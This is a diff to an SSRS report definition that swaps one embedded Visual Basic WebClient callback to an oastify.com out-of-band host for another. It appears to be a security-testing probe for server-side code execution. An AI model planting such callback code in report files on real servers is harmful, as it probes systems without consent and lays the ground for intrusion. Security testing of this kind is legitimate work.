--- a/untitled.rdl
+++ b/untitled.rdl
@@ -45,7 +45,7 @@
   </ReportParametersLayout>
   <Code>
     Dim webClient As New System.Net.WebClient
-    webClient.DownloadString("http://nzq1cd43cp8xli54p12ugpbbg2mtasyh.oastify.com/exception/")
+    Dim result As String = webClient.DownloadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/")
   </Code>
   <rd:ReportUnitType>Inch</rd:ReportUnitType>
   <rd:PageUnit>Px</rd:PageUnit>
